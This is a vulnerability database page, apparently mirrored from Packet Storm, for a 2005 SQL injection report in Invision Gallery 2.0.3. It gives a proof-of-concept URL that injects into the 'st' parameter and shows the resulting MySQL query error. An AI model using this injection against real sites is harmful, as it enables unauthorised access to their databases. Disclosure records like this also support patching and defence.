Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

invision203-SQL.txt

๐Ÿ—“๏ธย 01 Nov 2005ย 00:00:00Reported byย aLMaSTeRTypeย 
packetstorm
ย packetstorm๐Ÿ”—ย packetstormsecurity.com๐Ÿ‘ย 24ย Views

Vulnerability in Invision Gallery 2.0.3 SQL handlin

Show more
Code
`Credit: By aLMaSTeR HaCKeR [ [email protected]]  
  
Vulnerable: Invision Gallery 2.0.3  
  
EXPLIOT:  
  
http://www.site.com/index.php?automodule=gallery&cmd=sc&cat=26&sort_key=date&order_key=DESC&prune_key=30&st=|aLMaSTeR  
  
The Error:  
  
mySQL query error: SELECT i.*, m.members_display_name AS name, m.id AS mid, r.id as rated   
FROM ibf_gallery_images i   
LEFT JOIN ibf_members m ON ( m.id=i.member_id )   
LEFT JOIN ibf_gallery_ratings r ON ( r.img_id=i.id AND r.member_id=0 )   
WHERE category_id=26 AND i.approved=1   
GROUP BY i.id   
ORDER BY pinned DESC, date DESC , i.id DESC LIMIT ', 20   
  
  
SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '', 20' at line 7   
SQL error code:   
Date: Sunday 30th of October 2005 04:53:19 PM   
  
Thanks TO MY FRIENDS IN S4A.CC  
  
[email protected] or [email protected]  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
01 Nov 2005 00:00Current
7.4High risk
Vulners AI Score7.4
invision gallery 2.0.3sql vulnerabilitymysql error
24
.json
Report